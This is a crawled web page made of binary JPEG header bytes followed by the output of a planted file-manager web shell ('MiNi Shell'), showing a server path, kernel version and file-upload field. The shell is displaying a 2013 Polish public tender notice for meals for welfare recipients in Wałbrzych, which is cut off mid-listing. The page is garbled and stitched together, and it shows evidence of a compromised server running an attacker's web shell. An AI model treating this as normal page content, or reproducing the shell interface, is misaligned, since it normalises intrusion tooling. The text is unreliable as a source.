JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130604/214362-N-2013.html

<p class="kh_header"><b>Wałbrzych: Dożywianie podopiecznych MOPS w Wałbrzychu</b><br>
<b>Numer ogłoszenia: 214362 - 2013; data zamieszczenia: 04.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Beethovena 1-2, 58-300 Wałbrzych, woj. dolnośląskie, tel. 0-74 6640800, faks 0-74 6640800.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dożywianie podopiecznych MOPS w Wałbrzychu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Żywienie dorosłych odbywać się będzie od poniedziałku do piątku przez cały okres realizacji zamówienia. Posiłki muszą zawierać nie mniej niż 1000 kcal.
Posiłki muszą być jednodaniowe. W okresie tygodniowym skład posiłków ma przedstawiać się następująco:
.1 posiłek - ziemniaki, kasza lub ryż, mięso ( drobiowe, lub wieprzowe lub wołowe) surówka lub jarzyna, kompot lub kisiel,
.1 posiłek - ziemniaki, ryba (np. typu  dorsz lub mintaj itp.,  surówka lub jarzyna, kompot lub kisiel,
.2 posiłki - danie mączne (np. pierogi lub makaron z sosem lub naleśniki lub placki lub łazanki,  kompot lub kisiel
.1 posiłek - zupa  z wkładką (kiełbasa lub mięso drobiowe lub wieprzowe,  chleb),
przy czym poszczególne składniki posiłków powinny zawierać co najmniej następujące ilości:
.zupa - 350 ml,
.ziemniaki, kasza, ryż - 300 g,
.mięso - 150 g,
.ryba - 150 g,
.danie mączne - 400 g,
.surówka - 100 g,
.jarzyna - 100 g,
.kompot lub kisiel - 200 ml,
.mięso lub kiełbasa stanowiące  wkładkę do zupy - 100 g,
.chleb (do 4 kromek)
Inne wymagania, które musi spełniać wykonawca:
.Zamawiający nie dopuszcza powtarzalności posiłków w ciągu tygodnia,
.posiłki muszą być przygotowywane ze świeżych artykułów spożywczych posiadających aktualne terminy przydatności do spożycia, zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego,
.posiłki mogą być dowożone do miejsca ich wydania,
.Wykonawca w przypadku dowożenia posiłków do miejsca wydawania, zobowiązany jest do posiadania atestowanych termosów gwarantujących utrzymanie odpowiedniej temperatury oraz jakości przewożonych potraw,
.usługa powinna być wykonywana w godz. 12.00-16.00 od poniedziałku do piątku (bez sobót, niedziel oraz dni ustawowo określonych jako świąteczne),
.wydawanie posiłków odbywać się będzie dla osób objętych dożywianiem poza kolejnością,
.Wykonawca ma obowiązek wydania posiłku do pojemnika zapewnionego przez podopiecznego, pod warunkiem jednak, że pojemnik przeznaczony jest do tego celu,
.skład posiłków winien być podawany do wiadomości podopiecznych w jadłospisie, sporządzanym odrębnie na każdy dzień,
.szacunkowo dziennie wydawanych będzie ok. 670 posiłków, w ciągu trwania całej umowy - ok. 85.760 posiłków (z uwzględnieniem 6  podzadań). Zamawiający zastrzega, iż podana ilość posiłków w okresie obowiązywania umowy ma charakter orientacyjny, służący tylko dla porównania ofert i tym samym nie stanowi dla zamawiającego zobowiązania do zakupu w podanej ilości.  
.miejsce wykonywania usługi posiadać musi infrastrukturę techniczną i lokalową niezbędną do spożywania posiłków w lokalu,
.lokal musi znajdować się w danej dzielnicy,
.wymagane jest, aby lokal był dopuszczony do prowadzenia działalności w przedmiotowym zakresie przez odpowiednie służby sanitarne oraz spełniał warunki wynikające z przepisów dotyczących ochrony przeciwpożarowej i przepisów ustawy z dnia 7 lipca 1994 roku Prawo Budowlane (z 2010 roku, Nr 243, poz. 1623 z późn. zm),
.zamawiający informuje, iż część posiłków - szacunkowo ok. 20 % winno być przygotowane jako posiłki dietetyczne - zgodnie ze wskazaniami lekarza. O sytuacji takiej zamawiający poinformuje wykonawcę w treści decyzji administracyjnej nie później niż na 7 dni przed rozpoczęciem świadczenia usługi. Składniki z których posiłek taki będzie przygotowany jak i gramatura posiłku  winna być tożsama jak w przypadku posiłku zwykłego.
.Wykonawca zobowiązany będzie do utylizacji resztek i odpadów pokonsumpcyjnych.
.Zamawiający dopuszcza możliwość utworzenia więcej niż 1 punktu  żywieniowego w obrębie jednego podzadania.

Wykonawca, którego oferta zostanie wybrana będzie zobowiązany do ubezpieczenia się od odpowiedzialności cywilnej (deliktowej i kontraktowej) zawierającej następujące zapisy:
- minimalna suma gwarancyjna na jedno ryzyko: w  każdym podzadaniu - wynosi 100.000 zł. Całość - 600.000 zł.
- klauzule rozszerzające zakres:
Ubezpieczenie odpowiedzialności cywilnej za szkody będące następstwem przeniesienia chorób zakaźnych i biologicznych czynników chorobotwórczych (w tym szczególności salmonelli, czerwonki i innych zgodnie z ustawą o chorobach zakaźnych i zakażeniach - odpowiednich dla jednostek gastronomicznych)
Limit na jedno i wszystkie ryzyka - w każdym podzadaniu wynosi 100.000zł. Całość 600.000 zł.
Wykonawca zobowiązany będzie do przedłożenia kserokopii polisy ubezpieczeniowej, o określonym wyżej zakresie ubezpieczenia, najpóźniej w dniu podpisania umowy. Brak przedłożenia polisy w w/w terminie traktowany będzie jako odstąpienie od podpisania umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.32.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Każdy wykonawca w przypadku złożenia oferty zobowiązany jest do wniesienia wadium przetargowego w wysokości: 
-Podzadanie Nr 1 - 2000,00 zł
-Podzadanie Nr 2 - 2500,00 zł
-Podzadanie Nr 3 - 1500,00 zł
-Podzadanie Nr 4 - 1500,00 zł
-Podzadanie Nr 5 - 1500,00 zł
-Podzadanie Nr 6 - 3500,00 zł
2.Zgodnie z art. 45 ust. 3 wadium wnosi się przed upływem terminu składania ofert. 
3.Wadium może być wnoszone w jednej lub kilku formach określonych w art. 45 ust. 6 ustawy PZP.
4.Wadium wnoszone w pieniądzu wpłaca się na konto Miejskiego Ośrodka Pomocy Społecznej w Wałbrzychu: Bank Handlowy w Warszawie S.A. 90 1030 1289 0000 0000 9000 2031 przelewem z zaznaczeniem: WADIUM PRZETARGOWE Dożywianie podopiecznych MOPS w Wałbrzychu.
5.Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem art. 46 ust. 4a ustawy PZP.
6.Zamawiający zatrzymuje wadium na zasadach określonych w art. 46 ust. 4a i ust. 5 ustawy PZP</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy w przedmiotowym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy w przedmiotowym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy w przedmiotowym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy w przedmiotowym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy w przedmiotowym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie  potwierdzające, że Wykonawca nie zalega z opłacaniem podatków  opłat lub  oświadczenie, że Wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
2. Oświadczenie, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne lub, że Wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.walbrzych.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Wałbrzychu
ul. Beethovena 1-2
58 - 300 Wałbrzych
pok. 105.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.06.2013 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Wałbrzychu
ul. Beethovena 1-2
58 - 300 Wałbrzych
pok. 105.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Podzadanie Nr 1 - dzielnica Stary Zdrój.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Żywienie dorosłych odbywać się będzie od poniedziałku do piątku przez cały okres realizacji zamówienia. Posiłki muszą zawierać nie mniej niż 1000 kcal.
Posiłki muszą być jednodaniowe. W okresie tygodniowym skład posiłków ma przedstawiać się następująco:
.1 posiłek - ziemniaki, kasza lub ryż, mięso ( drobiowe, lub wieprzowe lub wołowe) surówka lub jarzyna, kompot lub kisiel,
.1 posiłek - ziemniaki, ryba (np. typu  dorsz lub mintaj itp.,  surówka lub jarzyna, kompot lub kisiel,
.2 posiłki - danie mączne (np.: pierogi lub makaron z sosem lub naleśniki lub placki lub łazanki,  kompot lub kisiel
.1 posiłek - zupa  z wkładką (kiełbasa lub mięso: drobiowe lub wieprzowe,  chleb),
przy czym poszczególne składniki posiłków powinny zawierać co najmniej następujące ilości:
.zupa - 350 ml,
.ziemniaki, kasza, ryż - 300 g,
.mięso - 150 g,
.ryba - 150 g,
.danie mączne - 400 g,
.surówka - 100 g,
.jarzyna - 100 g,
.kompot lub kisiel - 200 ml,
.mięso lub kiełbasa stanowiące  wkładkę do zupy - 100 g,
.chleb (do 4 kromek)
Inne wymagania, które musi spełniać wykonawca:
.Zamawiający nie dopuszcza powtarzalności posiłków w ciągu tygodnia,
.posiłki muszą być przygotowywane ze świeżych artykułów spożywczych posiadających aktualne terminy przydatności do spożycia, zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego,
.posiłki mogą być dowożone do miejsca ich wydania,
.Wykonawca w przypadku dowożenia posiłków do miejsca wydawania, zobowiązany jest do posiadania atestowanych termosów gwarantujących utrzymanie odpowiedniej temperatury oraz jakości przewożonych potraw,
.usługa powinna być wykonywana w godz. 12.00-16.00 od poniedziałku do piątku (bez sobót, niedziel oraz dni ustawowo określonych jako świąteczne),
.wydawanie posiłków odbywać się będzie dla osób objętych dożywianiem poza kolejnością,
.Wykonawca ma obowiązek wydania posiłku do pojemnika zapewnionego przez podopiecznego, pod warunkiem jednak, że pojemnik przeznaczony jest do tego celu,
.skład posiłków winien być podawany do wiadomości podopiecznych w jadłospisie, sporządzanym odrębnie na każdy dzień,
.szacunkowo dziennie wydawanych będzie ok. 111 posiłków, w ciągu trwania całej umowy - ok. 14.208 posiłków. Zamawiający zastrzega, iż podana ilość posiłków w okresie obowiązywania umowy ma charakter orientacyjny, służący tylko dla porównania ofert i tym samym nie stanowi dla zamawiającego zobowiązania do zakupu w podanej ilości.  
.miejsce wykonywania usługi posiadać musi infrastrukturę techniczną i lokalową niezbędną do spożywania posiłków w lokalu,
.lokal musi znajdować się w danej dzielnicy,
.wymagane jest, aby lokal był dopuszczony do prowadzenia działalności w przedmiotowym zakresie przez odpowiednie służby sanitarne oraz spełniał warunki wynikające z przepisów dotyczących ochrony przeciwpożarowej i przepisów ustawy z dnia 7 lipca 1994 roku Prawo Budowlane (z 2010 roku, Nr 243, poz. 1623 z późn. zm),
.zamawiający informuje, iż część posiłków - szacunkowo ok. 20 % winno być przygotowane jako posiłki dietetyczne - zgodnie ze wskazaniami lekarza. O sytuacji takiej zamawiający poinformuje wykonawcę w treści decyzji administracyjnej nie później niż na 7 dni przed rozpoczęciem świadczenia usługi. Składniki z których posiłek taki będzie przygotowany jak i gramatura posiłku  winna być tożsama jak w przypadku posiłku zwykłego.
.Wykonawca zobowiązany będzie do utylizacji resztek i odpadów pokonsumpcyjnych.
.Zamawiający dopuszcza możliwość utworzenia więcej niż 1 punktu  żywieniowego w obrębie jednego podzadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Podzadanie Nr 2 - dzielnica Śródmieście.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Żywienie dorosłych odbywać się będzie od poniedziałku do piątku przez cały okres realizacji zamówienia. Posiłki muszą zawierać nie mniej niż 1000 kcal.
Posiłki muszą być jednodaniowe. W okresie tygodniowym skład posiłków ma przedstawiać się następująco:
.1 posiłek - ziemniaki, kasza lub ryż, mięso ( drobiowe, lub wieprzowe lub wołowe) surówka lub jarzyna, kompot lub kisiel,
.1 posiłek - ziemniaki, ryba (np. typu  dorsz lub mintaj itp.,  surówka lub jarzyna, kompot lub kisiel,
.2 posiłki - danie mączne (np.: pierogi lub makaron z sosem lub naleśniki lub placki lub łazanki,  kompot lub kisiel
.1 posiłek - zupa  z wkładką (kiełbasa lub mięso: drobiowe lub wieprzowe,  chleb),
przy czym poszczególne składniki posiłków powinny zawierać co najmniej następujące ilości:
.zupa - 350 ml,
.ziemniaki, kasza, ryż - 300 g,
.mięso - 150 g,
.ryba - 150 g,
.danie mączne - 400 g,
.surówka - 100 g,
.jarzyna - 100 g,
.kompot lub kisiel - 200 ml,
.mięso lub kiełbasa stanowiące  wkładkę do zupy - 100 g,
.chleb (do 4 kromek)
Inne wymagania, które musi spełniać wykonawca:
.Zamawiający nie dopuszcza powtarzalności posiłków w ciągu tygodnia,
.posiłki muszą być przygotowywane ze świeżych artykułów spożywczych posiadających aktualne terminy przydatności do spożycia, zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego,
.posiłki mogą być dowożone do miejsca ich wydania,
.Wykonawca w przypadku dowożenia posiłków do miejsca wydawania, zobowiązany jest do posiadania atestowanych termosów gwarantujących utrzymanie odpowiedniej temperatury oraz jakości przewożonych potraw,
.usługa powinna być wykonywana w godz. 12.00-16.00 od poniedziałku do piątku (bez sobót, niedziel oraz dni ustawowo określonych jako świąteczne),
.wydawanie posiłków odbywać się będzie dla osób objętych dożywianiem poza kolejnością,
.Wykonawca ma obowiązek wydania posiłku do pojemnika zapewnionego przez podopiecznego, pod warunkiem jednak, że pojemnik przeznaczony jest do tego celu,
.skład posiłków winien być podawany do wiadomości podopiecznych w jadłospisie, sporządzanym odrębnie na każdy dzień,
.szacunkowo dziennie wydawanych będzie ok. 143 posiłków, w ciągu trwania całej umowy - ok. 18.304 posiłków. Zamawiający zastrzega, iż podana ilość posiłków w okresie obowiązywania umowy ma charakter orientacyjny, służący tylko dla porównania ofert i tym samym nie stanowi dla zamawiającego zobowiązania do zakupu w podanej ilości.  
.miejsce wykonywania usługi posiadać musi infrastrukturę techniczną i lokalową niezbędną do spożywania posiłków w lokalu,
.lokal musi znajdować się w danej dzielnicy,
.wymagane jest, aby lokal był dopuszczony do prowadzenia działalności w przedmiotowym zakresie przez odpowiednie służby sanitarne oraz spełniał warunki wynikające z przepisów dotyczących ochrony przeciwpożarowej i przepisów ustawy z dnia 7 lipca 1994 roku Prawo Budowlane (z 2010 roku, Nr 243, poz. 1623 z późn. zm),
.zamawiający informuje, iż część posiłków - szacunkowo ok. 20 % winno być przygotowane jako posiłki dietetyczne - zgodnie ze wskazaniami lekarza. O sytuacji takiej zamawiający poinformuje wykonawcę w treści decyzji administracyjnej nie później niż na 7 dni przed rozpoczęciem świadczenia usługi. Składniki z których posiłek taki będzie przygotowany jak i gramatura posiłku  winna być tożsama jak w przypadku posiłku zwykłego.
.Wykonawca zobowiązany będzie do utylizacji resztek i odpadów pokonsumpcyjnych.
.Zamawiający dopuszcza możliwość utworzenia więcej niż 1 punktu  żywieniowego w obrębie jednego podzadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Podzadanie Nr 3 - dzielnica Biały Kamień.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Żywienie dorosłych odbywać się będzie od poniedziałku do piątku przez cały okres realizacji zamówienia. Posiłki muszą zawierać nie mniej niż 1000 kcal.
Posiłki muszą być jednodaniowe. W okresie tygodniowym skład posiłków ma przedstawiać się następująco:
.1 posiłek - ziemniaki, kasza lub ryż, mięso ( drobiowe, lub wieprzowe lub wołowe) surówka lub jarzyna, kompot lub kisiel,
.1 posiłek - ziemniaki, ryba (np. typu  dorsz lub mintaj itp.,  surówka lub jarzyna, kompot lub kisiel,
.2 posiłki - danie mączne (np.: pierogi lub makaron z sosem lub naleśniki lub placki lub łazanki,  kompot lub kisiel
.1 posiłek - zupa  z wkładką (kiełbasa lub mięso: drobiowe lub wieprzowe,  chleb),
przy czym poszczególne składniki posiłków powinny zawierać co najmniej następujące ilości:
.zupa - 350 ml,
.ziemniaki, kasza, ryż - 300 g,
.mięso - 150 g,
.ryba - 150 g,
.danie mączne - 400 g,
.surówka - 100 g,
.jarzyna - 100 g,
.kompot lub kisiel - 200 ml,
.mięso lub kiełbasa stanowiące  wkładkę do zupy - 100 g,
.chleb (do 4 kromek)
Inne wymagania, które musi spełniać wykonawca:
.Zamawiający nie dopuszcza powtarzalności posiłków w ciągu tygodnia,
